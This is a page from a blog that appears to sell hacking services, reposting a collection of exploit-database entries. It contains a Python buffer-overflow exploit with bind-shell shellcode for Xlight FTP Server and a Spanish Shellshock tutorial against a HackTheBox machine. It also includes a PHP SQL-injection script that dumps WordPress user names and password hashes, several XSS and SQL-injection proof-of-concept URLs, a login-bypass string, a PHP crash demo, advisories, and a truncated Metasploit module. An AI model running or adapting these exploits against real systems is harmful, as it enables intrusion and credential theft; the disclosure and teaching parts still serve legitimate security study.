Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863113862

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/49257/info

OneFileCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

OneFileCMS 1.1.1 is vulnerable; other versions may also be affected. 

http://www.example.com/onefilecms/onefilecms.php?p='"><marquee><h1>XSS Vulnerability<script>alert(String.fromCharCode(88,83,83))</script></h1></marquee>
HireHackking 
source: https://www.securityfocus.com/bid/49255/info

Xlight FTP Serveris prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

Attackers can exploit this issue to execute arbitrary code within the context of the application. Failed attacks may cause a denial-of-service condition.

Xlight FTP Server 3.7.0 is vulnerable; other versions may also be affected.

#!/usr/bin/python

from socket import *
import sys, struct, os, time

print "\nXlightFTP Server v3.7.0 Remote Root BOF Exploit"
if (len(sys.argv) < 3):
	print "\nXlightFTP Server v3.7.0 Remote Root BOF Exploit"
        print "\n	Usage: %s <host> <port> \n" %(sys.argv[0])
	sys.exit()

print "\n[!] Connecting to %s ..." %(sys.argv[1])

# connect to host
sock = socket(AF_INET,SOCK_STREAM)
sock.connect((sys.argv[1],int(sys.argv[2])))
sock.recv(1024)
time.sleep(5)
#-------------------------------------------
buffer = "\x41" * 1337 # Junk
buffer += "\x90" * 123 # padding
#-------------------------------------------
# windows/shell_bind_tcp - 368 bytes
# Encoder: x86/shikata_ga_nai (http://www.metasploit.com)
# LPORT=4444, RHOST=192.168.1.2, EXITFUNC=process
buffer += ("\x33\xc9\xbf\xb8\xf7\xfd\xd9\xda\xd8\xd9\x74\x24\xf4\xb1"+
"\x56\x5d\x83\xc5\x04\x31\x7d\x0d\x03\x7d\xb5\x15\x08\x25"+
"\x2d\x50\xf3\xd6\xad\x03\x7d\x33\x9c\x11\x19\x37\x8c\xa5"+
"\x69\x15\x3c\x4d\x3f\x8e\xb7\x23\xe8\xa1\x70\x89\xce\x8c"+
"\x81\x3f\xcf\x43\x41\x21\xb3\x99\x95\x81\x8a\x51\xe8\xc0"+
"\xcb\x8c\x02\x90\x84\xdb\xb0\x05\xa0\x9e\x08\x27\x66\x95"+
"\x30\x5f\x03\x6a\xc4\xd5\x0a\xbb\x74\x61\x44\x23\xff\x2d"+
"\x75\x52\x2c\x2e\x49\x1d\x59\x85\x39\x9c\x8b\xd7\xc2\xae"+
"\xf3\xb4\xfc\x1e\xfe\xc5\x39\x98\xe0\xb3\x31\xda\x9d\xc3"+
"\x81\xa0\x79\x41\x14\x02\x0a\xf1\xfc\xb2\xdf\x64\x76\xb8"+
"\x94\xe3\xd0\xdd\x2b\x27\x6b\xd9\xa0\xc6\xbc\x6b\xf2\xec"+
"\x18\x37\xa1\x8d\x39\x9d\x04\xb1\x5a\x79\xf9\x17\x10\x68"+
"\xee\x2e\x7b\xe5\xc3\x1c\x84\xf5\x4b\x16\xf7\xc7\xd4\x8c"+
"\x9f\x6b\x9d\x0a\x67\x8b\xb4\xeb\xf7\x72\x36\x0c\xd1\xb0"+
"\x62\x5c\x49\x10\x0a\x37\x89\x9d\xdf\x98\xd9\x31\x8f\x58"+
"\x8a\xf1\x7f\x31\xc0\xfd\xa0\x21\xeb\xd7\xd7\x65\x25\x03"+
"\xb4\x01\x44\xb3\x2b\x8e\xc1\x55\x21\x3e\x84\xce\xdd\xfc"+
"\xf3\xc6\x7a\xfe\xd1\x7a\xd3\x68\x6d\x95\xe3\x97\x6e\xb3"+
"\x40\x3b\xc6\x54\x12\x57\xd3\x45\x25\x72\x73\x0f\x1e\x15"+
"\x09\x61\xed\x87\x0e\xa8\x85\x24\x9c\x37\x55\x22\xbd\xef"+
"\x02\x63\x73\xe6\xc6\x99\x2a\x50\xf4\x63\xaa\x9b\xbc\xbf"+
"\x0f\x25\x3d\x4d\x2b\x01\x2d\x8b\xb4\x0d\x19\x43\xe3\xdb"+
"\xf7\x25\x5d\xaa\xa1\xff\x32\x64\x25\x79\x79\xb7\x33\x86"+
"\x54\x41\xdb\x37\x01\x14\xe4\xf8\xc5\x90\x9d\xe4\x75\x5e"+
"\x74\xad\x86\x15\xd4\x84\x0e\xf0\x8d\x94\x52\x03\x78\xda"+
"\x6a\x80\x88\xa3\x88\x98\xf9\xa6\xd5\x1e\x12\xdb\x46\xcb"+
"\x14\x48\x66\xde")
#-------------------------------------
buffer += "\x90" * 8 # more nop's
#-------------------------------------
buffer += "\x07\xd5\xc5\x7c" # jmp esp in shell32.dll (Windows XP SP3 - Universal)
buffer += "\x0a" # end connection 
# send buffer
print "[*] Sending Buffer Junk..."
time.sleep(2)
print "[*] Spawn a Backshell Connecting..."
sock.send(buffer)
sock.recv(1024)
sock.close()
print "[+] Exploit succeed. Now NetCat %s on port 4444\n" %(sys.argv[1])
print "\n > Exploit By : KedAns-Dz - Dz Offenders Cr3w - Inj3ct0r Team"
sys.exit()
HireHackking

Shellshock Attack

Shellshock es una vulnerabilidad asociada al CVE-2014-6271 que salió el 24 de septiembre de 2014 y afecta a la shell de Linux «Bash» hasta la versión 4.3. Esta vulnerabilidad permite una ejecución arbitraria de comandos.

Índice:

  • Origen de Shellshock
  • Shellshock Remoto
  • Ejemplo de Explotación Remota
  • Referencias

Origen de Shellshock

La vulnerabilidad se originaba porque antes, a la hora de asignar una variable de entorno, bash te daba la posibilidad de asignar una función. Lo que ocurría cuando asignabas una función en el valor de una variable de entorno es que bash no se detenía en la propia definición, sino que continuaba y ejecutaba los comandos que se pusieran después de la definición de la función.

Literalmente tú después de leer este párrafo:

image 142

Ahora todo quedará más claro. Lo que ocurría antes es que tú podías declarar una función en una variable de entorno. Y ocurría un bug, que hacía que se ejecutara el comando que se colocase después. Por ejemplo, tú definías la siguiente funcion en la variable:

  • variable='() { contenido de la función;}; ‘

Y en vez de simplemente definirse, el bug que tenía bash ocasionaba que se ejecutase el comando que hubiese después de la definición de la función. A nivel de concepto, esto es todo. Para entender mejor esta vulnerabilidad, vamos a ver como funciona el comando env.

Este comando imprime las variables de entornos actuales. Pero también se puede usar para ejecutar un comando en un entorno con una variable especificada. El proceso que hace es el siguiente:

  1. env empieza un nuevo proceso
  2. Modifica el entorno de este nuevo proceso
  3. Ejecuta el comando que hemos dicho en el entorno creado

Por ejemplo, si pasamos como argumento el comando env para que se ejecute en el entorno que te crea el primer env, podremos ver las variables de entorno del contexto que crea el primer env:

image 147

Digamos que lo que está ocurriendo es:

«Oye, créame un entorno completamente limpio de variables de entorno. En este entorno la única variable de entorno que habrá será la que yo pase como argumento. Y dentro de este entorno, ejecútame el comando que digo, en este caso, env, para poder ver las variables de entorno del entorno que acabo de crear con el primer env, que al ser un entorno limpio, solo estará la variable de entorno que yo he pasado como argumento».

He añadido el parámetro –ignore-environment para simplemente explicar el concepto del entorno que crea env. Si no lo pusiéramos, simplemente en el nuevo entorno se heredaría todas las variables de entorno existentes en nuestra entorno actual.

Ok, ahora estás así:

image 141

Es normal, simplemente vuelve a leer el párrafo de arriba despacito y con buena letra.

Ahora bien, sabiendo esto, es aquí donde entra en juego el bug del que hemos hablado al principio, Shellshock. Si nosotros definimos la siguiente función en una variable:

  • mi_funcion='() { :;}; echo «ES VULNERABLE» ‘ 

No debería de pasar nada. Sin embargo, si probamos a definir esta función en una variable de una nueva shell de bash (nuevo proceso):

image 148

bash -c » es lo mismo que colocar bash -c :

En ambos le estamos diciendo que en la nueva instancia/subproceso, que simplemente no haga nada. Menciono esto porque el doble punto aparece en el payload característico de Shellshock y es solo por eso, establece un comando que simplemente no hace nada.

Se ejecuta, a pesar de que solo estamos definiendo una variable de entorno. Esto ocurre porque la nueva shell (el nuevo proceso) ve una variable de entorno que empieza por () y obtiene el nombre de la variable para ejecutarla y definir la función en el entorno. Sin embargo, como ya se ha dicho, el bug hacía que se ejecutase lo que se pusiera después de la función.

En un sistema no vulnerable, ejecutando el comando de la imagen de arriba, simplemente no pasará nada:

image 149

Y todo esto que he explicado es el bug y la famosa vulnerabilidad. Puedes pensar, oye, no es para tanto, porque al final, es un simple OS command injection en Linux.

Shellshock Remoto

Lo turbio de esta vulnerabilidad es que se puede explotar remotamente, por ejemplo, en un servidor web, ocasionando un Remote Command Execution (RCE). Los archivos susceptibles a un ataque Shellshock son los que comúnmente pertenezcan a alguna de las siguientes extensiones:

  • cgi
  • sh

Algunos servidores web, como por ejemplo apache, soportan lo que se llama Common Gateway Interface (CGI). Esta característica permite a programas externos, hacer uso de datos provenientes del servidor web. Esta funcionalidad se relaciona con la famosa carpeta cgi-bin que nos podemos encontrar muchas veces. Cgi-bin es una carpeta creada automáticamente para colocar scripts que queramos que interactúen con el servidor web.

Por lo que la explotación remota no se limita a los archivos .cgi. Se limita, a los archivos que interactúen con la bash usando en variables de entorno, datos del servidor web. Que es lo que permite el CGI.

Entonces, la idea de la explotación remota es que cualquier información recibida en una petición por parte del cliente como puede ser el User-Agent, Referer, u otros parámetros se almacenan en forma de variables de entorno para que puedan ser usadas por programas o scripts externos, por esto, los archivos situados en la carpeta cgi-bin son susceptibles a Shellshock.

Por curiosidad, las variables de entorno tendrán de nombre estilo: HTTP_<cabecera>. Por ejemplo, HTTP_USER_AGENT sería la variable de entorno que almacenaría el valor del User-Agent.

Estas variables de entorno, al tratarse al fin y al cabo de cabeceras cuyo valor podemos editar, pues lo tenemos todo. Por un lado, tenemos variables de entorno las cuales podemos controlar su contenido, y, por otro lado, tenemos la ejecución en bash de scripts que hacen uso de las variables de entorno que nosotros controlamos.

Si nosotros alterásemos el valor del User-Agent y lo sustituyéramos con un payload como el que hemos visto previamente. Estaría ocurriendo todo lo que hemos explicado. Una función definida en una variable de entorno, al pasarla al contexto de un nuevo entorno de un proceso de bash, ejecutará cualquier comando que se le ponga después de la declaración de la función.

Ejemplo de Explotación Remota

Vamos a ver como sería la explotación usando la máquina «Shocker» de HackTheBox.

Lo primero de todo es identificar el archivo que puede ser vulnerable, en este caso, es user.sh:

image 136

Una vez identificado es tan sencillo como enviar el payload característico de shellshock a través de alguna cabecera, por ejemplo, el User-Agent:

  • curl -H ‘User-Agent: () { :;}; echo; echo ¿Es vulnerable?’ ‘http://10.10.10.56/cgi-bin/user.sh’
image 137

También podemos comprobar con otra cabecera, por ejemplo, el Referer:

image 138

Podemos observar que en ambos casos se nos ha ejecutado la cadena del segundo echo. De esta forma, acabamos de verificar que es vulnerable. Por lo que ya prácticamente tenemos RCE, si queremos confirmarlo aún más, podemos probar a mandarnos paquetes ICMP:

image 139

Aquí hay varios detalles a comentar. Lo primero es que colocamos un echo después de la declaración de la función para que el segundo comando pueda mostrar su salida en la respuesta HTTP. Aun así, si no lo pusiéramos, aunque no veamos la salida del comando en la respuesta, lo estaríamos ejecutando.

Lo segundo es que, si nos fijamos estamos llamando a la bash de forma absoluta. Y esto es porque la variable $PATH está vacía en el entorno donde shellshock ejecuta el comando.

También podríamos mandarnos una reverse shell:

image 140

La explotación de esta vulnerabilidad realmente es tan sencillo como esto, colocar el payload clásico y boom, RCE.

Referencias

  • Understanding the Shellshock Vulnerability
  • HTB: Shocker
  • The ShellShock Attack
  • How to run a program in a clean environment in bash?
  • Exploiting CGI Scripts with Shellshock
  • Bash – Functions in Shell Variables
HireHackking 
source: https://www.securityfocus.com/bid/49249/info

PHP is prone to multiple denial-of-service vulnerabilities caused by a NULL-pointer dereference.

An attacker can exploit these issues to cause an application written in PHP to crash, denying service to legitimate users.

PHP 5.3.7 is vulnerable; other versions may also be affected. 

127# ulimit -m 100000
127# ulimit -v 100000
127# cat /www/strtotime.php
<?php
$strx=str_repeat("A",$argv[1]);
var_dump(strtotime($strx));
?>127#
127#  /cxib/5371/build/bin/php /www/strtotime.php 33388888
Memory fault (core dumped)

127# gdb -q /cxib/5371/build/bin/php
(gdb) r /www/strtotime.php 33388888
Starting program: /cxib/5371/build/bin/php /www/strtotime.php 33388888

Program received signal SIGSEGV, Segmentation fault.
0x0806e8bd in add_error (s=0xbfbfcf90,
    error=0x83ea7d8 "Double timezone specification")
    at /cxib/5371/ext/date/lib/parse_date.c:355
355             s->errors->error_messages[s->errors->error_count -
1].position = s->tok ? s->tok - s->str : 0;
(gdb) print s->errors->error_messages
$1 = (struct timelib_error_message *) 0x0
(gdb) print s->errors->error_count
$2 = 1835009
HireHackking 
source: https://www.securityfocus.com/bid/49235/info

MantisBT is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

MantisBT 1.2.6 is vulnerable; other versions may also be affected. 

http://www.example.com/path/search.php?project_id=[XSS]
http://www.example.com/path/core.php?mbadmin=[SQL]
HireHackking 
source: https://www.securityfocus.com/bid/49220/info

Adobe ColdFusion is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker could exploit this vulnerability to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

http://www.example.com/CFIDE/probe.cfm?name=<script>alert("G.R0b1n")</script>
HireHackking 
source: https://www.securityfocus.com/bid/49210/info

Code Widgets Multiple Question - Multiple Choice Online Questionaire is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/CS0099/index.asp?Q=2&A=[sqli]
HireHackking 
source: https://www.securityfocus.com/bid/49209/info

Code Widgets DataBound Collapsible Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/CS0077/main.asp?key=[sqli]
HireHackking 
source: https://www.securityfocus.com/bid/49208/info

Code Widgets DataBound Index Style Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/CS0106/category.asp?cat=[sqli]
HireHackking 
source: https://www.securityfocus.com/bid/49207/info

Code Widgets Online Job Application is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

The following example input is available:

Username : ' or 1=1 or ''=''
Password: ' or 1=1 or ''=''
HireHackking 
Realtek 11n Wireless LAN utility privilege escalation.

Vulnerability Discovered by Humberto Cabrera @dniz0r
http://zeroscience.mk @zeroscience

Summary:
	⁃	Realtek 11n Wireless LAN utility is deployed and used by realtek
alfa cards and more in order to help diagnose and view wireless card
properties.

Description:
  -	Unquoted Privilege escalation that allows a user to gain SYSTEM
privileges.

Date - 12 Feb 2015
Version: 700.1631.106.2011
Vendor: www.realtek.com.tw
Advisory URL:
https://eaty0face.wordpress.com/2015/02/13/realtek-11n-wireless-lan-utility-privilege-escalation/
Tested on: Win7

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: realtek11ncu
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\REALTEK\11n USB Wireless LAN
Utility\RtlService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Realtek11nCU
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Windows\system32>sc qc realtek11nsu
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: realtek11nsu
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\REALTEK\Wireless LAN
Utility\RtlService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Realtek11nSU
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
HireHackking 
<?php
 
/*

# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9  [SQL Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
# CVE : CWE-89
# OWASP Top10: A1-Injection


 This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
 
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
 
    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.
 
    # Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]
    # Date: 2015-02-12
    # Exploit Author: Mateusz Lach
    # Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
    # Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
    # Version: 1.4.9
    # Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
    # CVE : CWE-89
    # OWASP Top10: A1-Injection
 */
 
define('FETCH_PREFIX_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,(SELECT%%20CONCAT(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),1,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;--%%20--%%20&widget=0');
 
define('FETCH_USERS_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,%%20CONCAT(CHAR(35,33,35,33,35,33,35),GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,CHAR(35,%%2035),user_pass))),CHAR(35,33,35,33,35,33,35)),%%201,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20as%%20fakeGroup%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0');
 
define('FAKE_ID_TO_SEARCH', 12345677654321);
define('PATTERN_TO_SEARCH', 'ev_ids='.FAKE_ID_TO_SEARCH);
define('PATTERN_TO_SEARCH_USERS', '#!#!#!#');
define('ROW_SEPARATOR', ',');
define('FIELD_SEPARATOR', '##');
$server = $_GET['SRV'];
if (empty($server))
{
    echo 'Please put server (without protocol) name in SRV GET variable!';
}
else
{
    $fullURL = sprintf(FETCH_PREFIX_URL, $server, $server, FAKE_ID_TO_SEARCH);
    $prefixCurl = curl_init($fullURL);
    curl_setopt($prefixCurl, CURLOPT_RETURNTRANSFER, true);
    $result = curl_exec($prefixCurl);
    if (stripos($result, PATTERN_TO_SEARCH) !== false)
    {
        preg_match('/####[a-zA-Z\_0-9]*####/', $result, $tableNames);
        $tableName = str_replace('####', '', $tableNames[0]);
        echo 'tableName: '.$tableName.'<BR/>';
        $fullURL = sprintf(FETCH_USERS_URL, $server, $server, FAKE_ID_TO_SEARCH, $tableName);
        $usersCurl = curl_init($fullURL);
        curl_setopt($usersCurl, CURLOPT_RETURNTRANSFER, true);
        $result = curl_exec($usersCurl);  
        if (stripos($result, PATTERN_TO_SEARCH) !== false)
        {
            $from = stripos($result, PATTERN_TO_SEARCH_USERS);
            $to = stripos($result, PATTERN_TO_SEARCH_USERS, $from + strlen(PATTERN_TO_SEARCH_USERS));
            $result = substr($result, $from, $to-$from);
            echo '<table><tr><td>'.str_replace(FIELD_SEPARATOR, '</td><td>', str_replace(ROW_SEPARATOR, '</td></tr><tr><td>', str_replace(PATTERN_TO_SEARCH_USERS, '', $result))).'</td></tr></table>';
        }
        else
        {
            echo 'Table name fetched, but not users - try to rewrite exploit :-(';
        }
    }
    else
    {
        echo 'NOT vulnerable :-(';
    }
}
HireHackking 
######################
# Exploit Title: Multiple Exponent CMS Cross-Site Scripting Vulnerabilies
# Discovered by-
# Mayuresh Dani (mdani@qualys.com)
# Narendra Shinde (nshinde@qualys.com)
# Vendor Homepage: http://www.exponentcms.org/
# Software Link:
http://sourceforge.net/projects/exponentcms/files/exponent-2.3.1.zip/download
# Version: 2.3.1
# Date: 2014-10-11
# Tested on: Windows 7 / Mozilla Firefox
#            Ubuntu 14.04 / Mozilla Firefox
# CVE: CVE-2014-8690
######################
# Vulnerability Disclosure Timeline:
# 2014-11-04:  Discovered vulnerability
# 2014-11-04:  Vendor Notification
# 2014-11-05:  Vendor confirmation
# 2014-11-06:  Vendor fixes Universal XSS -
http://www.exponentcms.org/news/security-patch-released-for-v2-1-4-v2-2-3-and-v2-3-0
# 2015-02-12:  Public Disclosure
######################
# Description
# Exponent CMS is a free, open source, open standards modular enterprise
software framework and content management system (CMS) written in the PHP.
#
# CVE-2014-8690:
# Universal XSS - Exponent CMS builds the canonical path field from an
unsanitized URL, which can be used to execute arbitrary scripts.
# Examples:
#
http://server/news/show/title/time-for-a-heavy-harvest-new-release/src/%22%3E%3Cscript%3Ealert%287%29%3C/script%3E@random4cd201e063d5c
#
http://server/news/show/title/%22%3E%3Cscript%3Ealert%287%29%3C/script%3Etime-for-a-heavy-harvest-new-release/src/@random4cd201e063d5c
#
http://server/news/%22%3E%3Cscript%3Ealert%287%29%3C/script%3Eshow/title/time-for-a-heavy-harvest-new-release/src/@random4cd201e063d5c
#
# 2.b. XSS in user profiles.
# The "First Name" and "Last Name" fields on
http://server/exponent/users/edituser are not sufficiently sanitized. Enter
your favourite script and the application will execute it everytime for you.
#
# More information and PoCs -
http://exponentcms.lighthouseapp.com/projects/61783/tickets/1230-universal-cross-site-scripting-in-exponent-cms-231-and-prior
#
#
# Thanks,
# Mayuresh & Narendra
HireHackking 
######################

# Exploit Title : Wordpress Video Gallery 2.7 SQL Injection Vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery

# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.7.zip

# Dork Google: inurl:/wp-admin/admin-ajax.php?action=rss
            

# Date : 2015-02-11

# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox         

######################

# Vulnerability Disclosure Timeline:

2015-02-08:  Discovered vulnerability
2015-02-09:  Vendor Notification
2015-02-10:  Vendor Response/Feedback 
2015-02-10:  Vendor Send Fix/Patch 
2015-02-11:  Public Disclosure 

# Description

Wordpress Video Gallery 2.7 suffers from SQL injection


######################

# PoC

http://target/wp-admin/admin-ajax.php?action=rss&type=video&vid=[SQLi]


#####################

# Fix/patch sent by apptha's developer

File: videogalleryrss.php

Change line n.47 

from:

		$vid             = filter_input(INPUT_GET,'vid');
to:

		$vid             = intval(filter_input(INPUT_GET,'vid'));

#####################

Discovered By : Claudio Viviani
        	http://www.homelab.it
        	info@homelab.it
        	homelabit@protonmail.ch

        	https://www.facebook.com/homelabit
        	https://twitter.com/homelabit
        	https://plus.google.com/+HomelabIt1/
		https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
HireHackking 
Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics
          Page

During a penetration test, RedTeam Pentesting discovered that the IBM
Endpoint Manager Relay Diagnostics page allows anybody to persistently
store HTML and JavaScript code that is executed when the page is opened
in a browser.


Details
=======

Product: IBM Endpoint Manager
Affected Versions:  9.1.x versions earlier than 9.1.1229,
                    9.2.x versions earlier than 9.2.1.48
Fixed Versions: 9.1.1229, 9.2.1.48
Vulnerability Type: Cross-Site Scripting
Security Risk: medium
Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013
Advisory Status: published
CVE:  CVE-2014-6137
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137


Introduction
============

IBM Endpoint Manager products - built on IBM BigFix technology - can
help you achieve smarter, faster endpoint management and security. These
products enable you to see and manage physical and virtual endpoints
including servers, desktops, notebooks, smartphones, tablets and
specialized equipment such as point-of-sale devices, ATMs and
self-service kiosks. Now you can rapidly remediate, protect and report
on endpoints in near real time.

(from the vendor's homepage)


More Details
============

Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint
Manager, or TEM) components, such as TEM Root Servers or TEM Relays,
typically serve HTTP and HTTPS on port 52311. There, the server or relay
diagnostics page is normally accessible at the path /rd. That page can
be accessed without authentication and lets users query and modify
different information. For example, a TEM Relay can be instructed to
gather a specific version of a certain Fixlet site by requesting a URL
such as the following:

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion
  &url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite
  &version=1
  &useCRC=0

The URL parameter url is susceptible to cross-site scripting. When the
following URL is requested, the browser executes the JavaScript code
provided in the parameter:

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion
  &version=1
  &url=http://"><script>alert(/XSS/)</script>
  &version=1
  &useCRC=0

The value of that parameter is also stored in the TEM Relay's site list,
so that the embedded JavaScript code is executed whenever the
diagnostics page is opened in a browser:

$ curl http://tem-relay.example.com:52311/rd
[...]

<select NAME="url">
[...]
    <option>http://"><script>alert(/XSS/)</script></option>
</select>


Proof of Concept
================

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion&version=1
  &url=http://"><script>alert(/XSS/)</script>
  &version=1
  &useCRC=0


Fix
===

Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48.


Security Risk
=============

As the relay diagnostics page is typically not frequented by
administrators and does not normally require authentication, it is
unlikely that the vulnerability can be exploited to automatically and
reliably attack administrative users and obtain their credentials.

Nevertheless, the ability to host arbitrary HTML and JavaScript code on
the relay diagnostics page, i.e. on a trusted system, may allow
attackers to conduct very convincing phishing attacks.

This vulnerability is therefore rated as a medium risk.


Timeline
========

2014-07-29 Vulnerability identified during a penetration test
2014-08-06 Customer approves disclosure to vendor
2014-09-03 Vendor notified
2015-01-13 Vendor releases security bulletin and software upgrade
2015-02-04 Customer approves public disclosure
2015-02-10 Advisory released


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.


-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer:                       Patrick Hof, Jens Liebchen
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Achat v0.150 beta7 Buffer Overflow',
      'Description'    => %q{
        This module exploits an unicode SEH based stack buffer overflow in Achat v0.150. By
        sending a crafted message to the default port 9256 it's possible to overwrites the
        SEH handler. Even when the exploit is reliable it depends of timing since there are
        two threads overflowing the stack in the same time. This module has been tested on
        Windows XP SP3 and Windows 7.
      },
      'Author'         =>
        [
          'Peter Kasza <peter.kasza[at]itinsight.hu>', # Vulnerability discovery
          'Balazs Bucsay <balazs.bucsay[at]rycon.hu>' # Exploit, Metasploit module
        ],
      'License'	       => MSF_LICENSE,
      'References'     =>
        [
          ['CWE', '121'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'    => 730,
          'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"),
          'StackAdjustment' => -3500,
          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
          'EncoderOptions'  =>
            {
              'BufferRegister' => 'EAX'
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested OK Windows XP SP3, Windows 7
          # Not working on Windows Server 2003
